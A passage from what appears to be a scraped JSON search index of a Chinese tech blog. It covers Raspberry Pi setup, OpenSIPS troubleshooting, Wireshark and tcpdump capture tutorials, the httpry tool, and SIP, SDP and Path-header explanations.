然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如何找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:27:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/","title":"树莓派初始化配置"},{"content":" 可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 Here are your results. I\u0026rsquo;m attaching the full backtrace (looks about the same) and the logs containing the memory debug. 
Please let me know if you need additional info.\n这个讨论很有价值 感觉和curl超时有关 https://github.com/OpenSIPS/opensips/issues/929 I checked with a tcpdump, and that http request was answered after 40ms, but opensips missed it. Another strange thing is that despite of the use of async, opensips does not process any other SIP request while waiting for this missing answer, I see because with default params, with 20s timeout, opensips didn\u0026rsquo;t process REGISTER request and SIP endpoints unregistered, this is the reason because I changed connection timeout to 1s.\nI\u0026rsquo;ve discovered that this issue occured only if http keepalive (tcp persistent connection) is enabled. I\u0026rsquo;ve simply added \u0026ldquo;KeepAlive Off\u0026rdquo; directive in httpd configuration and the problem stopped.\nI hope this info will be useful for debugging.\n使用opensipsctl trap 可以产生调用栈文件 WARNING:core:utimer_ticker: utimer task already scheduled for 8723371990 ms (now 8723387850 ms), it may overlap.\n参考资料 https://github.com/OpenSIPS/opensips/issues/1767 https://opensips.org/pipermail/users/2018-October/040151.html https://github.com/OpenSIPS/opensips/issues/2183 https://github.com/OpenSIPS/opensips/issues/1858 https://opensips.org/pipermail/users/2019-August/041454.html https://opensips.org/pipermail/users/2017-October/038209.html ","permalink":"https://wdd.js.org/opensips/ch1/utime-task-scheduled/","summary":"可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. 
The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 ere are your results.","title":"utimer task \u003ctm-utimer\u003e already scheduled"},{"content":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.addr == 192.168.2.4 and tcp.port == 2145 and !tcp.port == 3389 6. 只关心某些特殊的tcp包 tcp.flags.fin==1 只过滤关闭连接的包 tcp.flags.syn==1\t只过滤建立连接的包 tcp.flags.reset==1 只过滤出tcp连接重置的包 7. 统计模块 7.1. 查看有哪些IP Statistics -\u0026gt; endpoints\n7.2. 查看那些IP之间发生会话 Statistics -\u0026gt; Conversations\n7.3. 按照协议划分 8. 最后 在会使用上述四个过滤方式之后,就可以自由的扩展了\n🏄🏄🏄🏄🏄🏄 ⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️ 🏋️🏋️🏋️🏋️🏋️🏋️\nhttp.request.method == GET # 基于http请求方式的过滤 ip.src == 192.168.1.4 ","permalink":"https://wdd.js.org/network/wireshark/","summary":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 
为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.","title":"Wireshark抓包教程"},{"content":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.enp89s0 [Up, Running, Connected] 2.docker0 [Up, Running, Connected] 3.vetha051ecc [Up, Running, Connected] 4.vethe67e03a [Up, Running, Connected] 5.vethc58c174 [Up, Running, Connected] 指定网卡 -i tcpdump -i eth0 所有网卡 tcpdump -i any 不要域名解析 tcpdump -n -i any 指定主机 tcpdump host 192.168.0.1 指定源IP或者目标IP # 根据源IP过滤 tcpdump src 192.168.3.2 # 根据目标IP过滤 tcpdump dst 192.168.3.2 指定协议过滤 tcpdump tcp 指定端口 # 根据某个端口过滤 tcpdump port 33 # 根据源端口或者目标端口过滤 tcpdump dst port 33 tcpdump src port 33 # 根据端口范围过滤 tcpdump portrange 30-90 根据协议和IP地址过滤 tcpdump -i ens33 tcp and host 192.168.40.30 抓包结果写文件 tcpdump -i ens33 tcp and host 192.168.40.30 -w log.pcap 每隔30秒写一个文件 -G 30 表示每隔30秒写一个文件 文件名中的%实际上是时间格式 tcpdump -i ens33 -G 30 tcp and host 192.168.40.30 -w %Y_%m%d_%H%M_%S.log.pcap 每达到30MB产生一个文件 -C 30 每达到30MB产生一个文件 tcpdump -i ens33 -C 30 
tcp and host 192.168.40.30 -w log.pcap 指定抓包的个数 在流量很大的网络上抓包,如果写文件的话,很可能将磁盘写满。所以最好指定一个最大的抓包个数,在达到包的个数后,自动退出。\ntcpdump -c 100000 -i eth0 host 21.23.3.2 -w test.pcap 抓包文件太大,切割成小包 把原来的包文件切割成20M大小的多个包\ntcpdump -r old_file -w new_files -C 20 按照包长大小过滤 # 包长小于某个值 tcpdump less 30 # 包长大于某个值 tcpdump greater 30 按照16进制的方式显示包的内容 BPF 过滤规则 port 53 src port 53 dest port 53 host 1.2.3.4 src host 1.2.3.4 dest host 1.2.3.4 host 1.2.3.4 and port 53 读取old.pcap文件 然后根据条件过滤 产生新的文件 适用于从一个大的pcap文件中过滤出需要的包\ntcpdump -r old.pcap -w new.pcap less 1280 最佳实践 1. 关注 packets dropped by kernel的值 有时候,抓包停止后,tcpdump打印xxx个包drop by kernel。一旦这个值不为零,就要注意了。某些包并不是在网络中丢包了,而是在tcpdump这个工具给丢弃了。\n60 packets captured 279514 packets received by filter 279368 packets dropped by kernel 默认情况下,tcpdump抓包时会做dns解析,这个dns解析会降低tcpdump的处理速度,造成tcpdump的buffer被填满,然后就被tcpdump丢弃。\n我们可以用两个方法解决这个问题\n-B 指定buffer的大小,默认单位为kb。例如-B 1024 -n -nn 设置tcpdump 不要解析host地址,不要抓换协议和端口号 -n Don\u0026#39;t convert host addresses to names. This can be used to avoid DNS lookups. -nn Don\u0026#39;t convert protocol and port numbers etc. to names either. -B buffer_size --buffer-size=buffer_size Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes). 参考 https://serverfault.com/questions/131872/how-to-split-a-pcap-file-into-a-set-of-smaller-ones http://alumni.cs.ucr.edu/~marios/ethereal-tcpdump.pdf ethereal-tcpdump.pdf https://unix.stackexchange.com/questions/144794/why-would-the-kernel-drop-packets ","permalink":"https://wdd.js.org/network/tcpdump/","summary":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... 
] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.","title":"Tcpdump抓包教程"},{"content":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","permalink":"https://wdd.js.org/network/httpry/","summary":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","title":"http抓包工具httpry使用"},{"content":"1. 什么是SDP? SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. 
o= 发起者id o=的格式\no=username session-id version network-type address-type address username: 登录的用户名或者主机host session-id: NTP时间戳 version: NTP时间戳 network-type: 一般是IN, 表示internet address-type: 表示地址类型,可以是IP4, IP6 2.3. c= 连接数据 c=的格式\nc=network-type address-type connection-address network-type: 一般是IN, 表示internet address-type: 地址类型 IP4, IP6 connection-address: 连接地址 2.4. m= 媒体信息 格式\nm=media port transport format-list media 媒体类型 audio 语音 video 视频 image 传真 port 端口号 transport 传输协议 format-list 格式 m=audio 49430 RTP/AVP 0 6 8 99 m=application 52341 udp wb 2.5. a= 扩展属性 2.6. 通用扩展 3. SDP中的RTP RTCP 信息 RTP的端口一般是偶数,例如下面的4002。RTCP是RTP端口下面的一个奇数,如4003。 RTP中传递的是媒体信息,RTCP是用于控制媒体信息传递的控制信令,流入丢包的数据。\nm=audio 4002 RTP/AVP 104 3 0 8 96 a=rtcp:4003 IN IP4 192.168.1.5 4. WebRTC中的RTP和RTCP端口 在WebRTC中,RTP和RTCP的端口一般是公用一个。 在INIVTE消息的SDP中会带有:\na=rtcp-mux 如果服务端同意公用一个端口,并且INVITE请求成功,那么在200 OK的SDP中可以看到下面的内容。 可以看到RTP和RTCP公用20512端口。\nm=audio 20512 RTP/SAVPF 0 8 101 a=rtcp:20512 a=rtcp-mux 5. 参考 https://www.ietf.org/rfc/rfc2327.txt ","permalink":"https://wdd.js.org/opensips/ch1/sip-with-sdp/","summary":"1. 什么是SDP? 
SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. o= 发起者id o=的格式","title":"SIP和SDP的关系"},{"content":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 重传的invite消息,可能包含相同的callI和cseq, 为了影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. 
sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11. 代理服务器和UA与网关的区别? 代理服务器没有媒体处理能力 代理服务器不解析消息体,只解析消息头 代理服务器并不分发消息 12. 什么是Forking Proxy? Forking Proxy收到一个INVITE请求,却发出去多个INVITE来呼叫多个UA, 适用于多人会议。 13. SIP url有哪些形式? 下图是 sip url 参数列表: 比较重要的有\nlr ob transport 14. ACK请求的要点知识 只有INVITE需要ACK确认 2xx响应的ACK由主叫方产生 3xx, 4xx,5xx,6xx的ACK是逐跳的,并且一般是代理服务器产生 15. 可靠性的机制 重传 T1 T2 sip如果使用tcp, 那么tcp是自带重传的,不需要sip再做重传机制。如果使用udp, udp本身是没有可靠性的保证的。那么这就需要应用层去自己实现可靠性。\n请求在发送出去时,会启动定时器 重传在达到64T1, 呼叫宣布失败 16. ACK 消息 Cseq method会怎样改变? Cseq不变 method变为ACK 主叫方发送ack, 其中ack的CSeq序号和invite保持一致 17. 端到端的ACK和逐跳的ACK有什么区别 对200响应的ACK是端到端的,对非200的ACK是逐跳的 端到端的ACK是一个新的事务,有新的branchId 逐跳的ACK和上一个INVITE请求的branchId一致 当你收到ACK请求时,你要判断这个ACK是应当立即传递到下一跳,还是自己处理 18. 非INVITE请求的重传 消息发送出去时,启动定时器,周期为T1 如果定时器过期,则再启动定时器,周期为2T1, 周期2倍递增,如果周期到达T2, 则以后的重传周期都是T2 如果中间收到了1xx的消息,则计时器立即将周期设置为T2, 并在T2过期时再次重发 19. INVITE请求的重传 请求以2倍之前的周期执行重传 如果收到1xx的响应,则不会再重传 20. 端到端与逐跳的区别 21. cancel消息的特点 cancel是逐跳的 cancel的CSeq和branchId和上一个invite一致 一般的cancel请求处理图 22. Via的特点 请求在传递给下一站时,UA会在在最上面加上自己的Via头。 branch tag来自 from, to, callId, request-url的hash值 大多数sip头的顺序都是不重要的,但是Via的顺序决定了,响应应该送到哪里 如果请求不是来自Via头 23. 24 CSeq CSeq 会持续增长,有可能不会按1递增 同一个事务的CSeq是相同的 ACK的CSeq会和invite一致 ","permalink":"https://wdd.js.org/opensips/ch1/sip-notes/","summary":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 
重传的invite消息,可能包含相同的callI和cseq, 为了影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11.","title":"SIP协议拾遗补缺"},{"content":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","permalink":"https://wdd.js.org/opensips/ch1/trunk-pbx-gateway/","summary":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","title":"Trunk Pbx 
Gateway"},{"content":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p2,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头用来一般在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-path/","summary":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p2,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头用来一般在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","title":"Path头简史"},{"content":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 
在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/09/hugo-timezone/","summary":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","title":"Hugo Timezone没有设置, 导致页面无法渲染"},{"content":" sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。\nTip Via 何时添加: 除了目的地外,请求从ua发出去时 何时删除: 除了目的地外,请求从ua发出去时 作用: 除了目的地外,请求从ua发出去时 Via的作用是让sip消息能够按照原路返回 比喻: 第一次离开家的人,只有每次经过一个地方,就记下地名。那么在回家的时候,他才能按照原来的路径返回。 Tip route 何时添加: 当请求从uac发出去时 何时删除: 请求离开ua时 作用: 
